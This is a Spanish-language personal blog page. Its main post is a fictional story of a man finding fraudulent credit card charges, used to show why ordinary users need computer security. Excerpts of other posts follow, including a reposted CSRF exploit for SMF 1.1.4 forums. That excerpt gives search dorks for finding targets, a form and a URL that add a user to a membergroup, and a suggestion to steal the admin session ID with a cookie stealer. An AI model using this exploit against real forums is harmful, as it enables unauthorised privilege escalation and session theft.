Ir al contenido principal

La Seguridad Informática es para todos.


De vez en mes o más me gusta escribir un poco, les dejo un texto sobre la importancia de la seguridad informática para usuarios comunes, en solo un pequeño rubro de la misma.

Imagina que estás recostado en tu sofá favorito, disfrutando una hermosa tarde de primavera, afuera hay sol, el día transcurrió tranquilo, en tu trabajo se solucionaron problemas que tenían meses rondando, y tu jefe notó esto. 

En fin, todo está perfecto, sales a tu puerta y recoges tu correspondencia, entre todas ellas hay cartas de familiares nostálgicos a los cuales aún les encanta ocupar este medio, eso claro te alegra, por que de vez en cuando da mucho gusto ver ese calor humano impregnado en un papel, o caligrafía por llamarlo de otra forma. 

Cuando llegas a tus estados de cuenta bancarios suspiras, puesto que el mes pasado lograste liquidar esas enormes deudas que tenías, el pago de esa flamante televisión, de esa gran computadora y de ese increíble sistema de audio, ya están liquidados, y por lo mismo habías obtenido tu crédito para comprar ese carro que siempre habías querido. 

Al abrir el primer estado de cuenta te sorprendes, ¡pues tienes un saldo de 32 mil pesos!

¿Pero como es posible? 

Te exaltas y te enojas, tu ya no le debes nada al banco, tu cuenta debería estar en ceros, es un error, te repites dos o tres veces, seguro que es un error. 

Abres el siguiente estado de cuenta y en esta tienes un saldo de 48 mil pesos! 

Vamos, esto no puede ser posible, como voy a tener estos saldos en mis dos tarjetas del Gran Banco Nacional Mexicano (GBNM por sus siglas).

Al ver detalladamente tus estados de cuenta, empiezas a leer que aparentemente te das una gran vida, un viaje a Cancun, hospedandote en el gran hotel 5 estrellas por 3 noches, cuentas de comida de 6 mil pesos, la renta de un automovil BMW para estar allá y demás gastos que tienes en tu tarjeta. 


Marcas a la linea de atención de tu gran Banco Nacional Mexicano, para lo cual, primero peleas con su excelente servicio de atención por medio de conmutador, marcas 1, después el 4, después el 2, después el 9, y regresas al punto número 1, después de media hora que no te has dado por vencido, por fin das con el menú de: “Atención de un ejecutivo de cuenta”.

Suena la linea para hablar con el ejecutivo: “tuuuu tuu... tuuuu tuu... “, “Por el momento nuestros ejecutivos se encuentran ocupados, su llamada es muy importante para nosotros, por favor espere en la linea”, bueno, es mucho dinero el que tengo que aclarar, vale la pena esperar, no me voy a enojar (te dices a ti mismo). 

Ahora esperaste 45 minutos más, en lo que un ejecutivo se desocupo y pudieron atender tu llamada. 

“Hola, buenas tardes, le atiende Juan Camaney, con quien tengo el gusto?”
“Hola Juan, buenas tardes, habla Jorge Perez”. 
“Hola Jorge, en que le puedo ayudar?”
“Mira, lo que pasa es que tengo cargos en mis tarjetas de crédito, los cuales yo no realice y quiero ver que puedo hacer para solucionarlo” 
“Señor Jorge, antes de continuar, necesito que me confirme unos datos, ¿Cual es su nombre completo? ¿Cual es el número de tarjeta? ¿Cual es su domicilio? ¿Cual es el número de su carnet? ¿Que vacunas tiene usted? ¿A los cuantos años tuvo su primer pesadilla? ¿A los cuantos meses le hicieron el tamiz neonatal?
Muchas gracias por responder señor Jorge (una hora y media, desde que levantaste el teléfono y decidiste marcar para aclarar esos cobros indebidos), que cargos son los que usted no hizo señor Jorge? 
Todos, en las dos tarjetas tengo cargos que yo no hice, viajes, boletos de avión, hospedajes, comidas, ningún cargo que está en esas dos tarjetas los hice yo, yo tenía el saldo en ceros en ambas. 
Permítame un momento señor Jorge, voy a corroborar unas cosas de sus tarjetas en el sistema. 

(10 minutos después) 

Disculpe la demora señor Jorge, efectivamente, el sistema me indica que hay firmas suyas en los bauchers de compra, vamos a levantar un ticket de soporte para que esto sea investigado y en caso de que usted no haya hecho las compras se pueda solucionar el problema, le comento que este seguimiento puede tardar de 30 a 90 días hábiles, ya usted decide si paga los intereses por esos cargos que al final si no los hizo usted se le devolverían, o en caso contrario se acumulan los intereses cargados. 

PERO! Yo no hice esas compras, por que me van a cobrar el interés por algo que yo no compré. 

Como le comento señor Jorge, estos intereses si no los cubre y el ticket de soporte sale a su favor, no los tiene que pagar. 

Hasta aquí, han pasado dos horas desde que levantaste el teléfono y empezaste la travesía en el banco, estás enojado, preocupado y desesperado, realmente no sabes que hacer, solo te queda esperar a que el banco falle a tu favor y te sea regresada esa enorme cantidad de dinero. 

Empiezas a hacer memoria de los pagos que realizaste el mes pasado, y en un momento de lucidez, recuerdas que hiciste pagos en tu café favorito llamado Starbucks, donde tienen internet gratuito para sus clientes. 

Pues si, lo más seguro es que en ese café había un usuario malintencionado que estaba capturando datos que pasaban por la red, y por lo tanto tus datos, el número de tarjeta, el cvv, la fecha de expiración, el nombre como está en la tarjeta, y en una de esas hasta tu dirección. 

Hasta este punto, ¿se ha identificado usted querido lector? 

Este fue solo un ejemplo, del por qué es tan importante la seguridad informática, en este caso para un usuario común.

Espero les haya gustado! :D 

Saludos cordiales. 

Alfonso Cuevas (aka Komtec1 :P)

Comentarios

Camila ha dicho que…
El tema de la seguridad informática me parece esencial, ya que hoy en dia se maneja mucha informacion y muy importante en términos informaticos, por eso debe cuidarse. Cuando estuve en los hoteles 5 estrellas de EEUU, pude comprobar que había una mayor seguridad en los datos que se manejaban internamente

Entradas populares de este blog

Solución [fix] a hamachi Logging in .. failed, busy

Hola!

Aquí con una pequeña entrada, pero que a más de uno le será útil.

Tengo hamachi instalado en varias máquinas, pero en una precisamente al reiniciar, algunas veces me da este problema:

usuarioserver@server:~$ sudo hamachi login
[sudo] password for usuarioserver:
Logging in .. failed, busy

Lo busqué en internet y la "solución" que dan, es reinstalar hamachi, y para los que han instalado hamachi en ubuntu, saben que no es una opción, pues se tendrían que hacer estos pasos: 
sudo apt-get remove logmein-hamachi sudo dpkg -i logmein-hamachixxx.deb sudo apt-get install -f
Para lo cual (siempre) es molesto hacer esos pasos, y algunas veces la configuración se llega a perder. 
Para solucionar ese problema, basta con hacer un: 
sudo /etc/init.d/logmein-hamachi force-reload
Esto forzará el reinicio de hamachi, y así después hacen: 
sudo hamachi login
Y listo, el problema de failed busy desaparece y los deja loguear bien en la red de hamachi. 
Espero les sirva! :D 
Saludos 
Komtec…

Integrar API de Google Maps, archivos kml, kmz y otras fumarolas :D

Ya que andamos en eso de la posteada ahora les voy a dejar un pequeño manual sobre como integrar la API de maps (google) dentro de nuestro código, hay varia documentación en la página developers de google, pero realmente lo que uno busca cuando pone en google: "integrar api de maps" es ver un ejemplo claro y directo para que se pueda entender de mejor forma.

Así que pues ya comentada la información de arriba les paso a dejar un ejemplo.

Lo primero que tenemos que poner en nuestro código es la llamada a la API de maps:


<script type="text/javascript" src="http://maps.googleapis.com/maps/api/js?sensor=false&language=es"></script>En este caso la variable sensor está en false, esto nos indica que no hay un dispositivo gps que pueda tomar la ubicación (se pone generalmente en true cuando es para aplicación movil, llámese celular o tableta)El lenguaje declaramos español, esto es para los menús que se van a mostrar en el mapa. Una vez que tenemo…

SMF 1.1.4 - Add User In Group [CSRF]

Bueno en primera este post lo saque de remoteexecution.es el link es este:

http://www.remoteexecution.es/foro/index.php?topic=879

Dork: "SMF 1.1.4"
Dork (SID): inurl:index.php inurl:sid= "SMF 1.1.4"


< h t m l >
< h e a d >
< b o d y >
< action="http://adress.com/path/index.php?action=membergroups;sa=members;group=GroupID" method="post" type="text" name="toAdd" id="toAdd" size="30">
< type="submit" name="add" value="Add Members">
< type="hidden" name="sc" value="ADMIN SESSION ID">
< /form>
< /body>
< /html>

o si no tambien se puede usar

forum/path/index.php?action=membergroups;sa=members;group=groupid;toAdd=usertoadd&add=Add+Members&sc=sid
by Syntacks!

Todo lo que usted necesita es administrador identificación de la sesión (SID), intentan engañar a los admin (utilizando cookie stealer etc ..)

|| …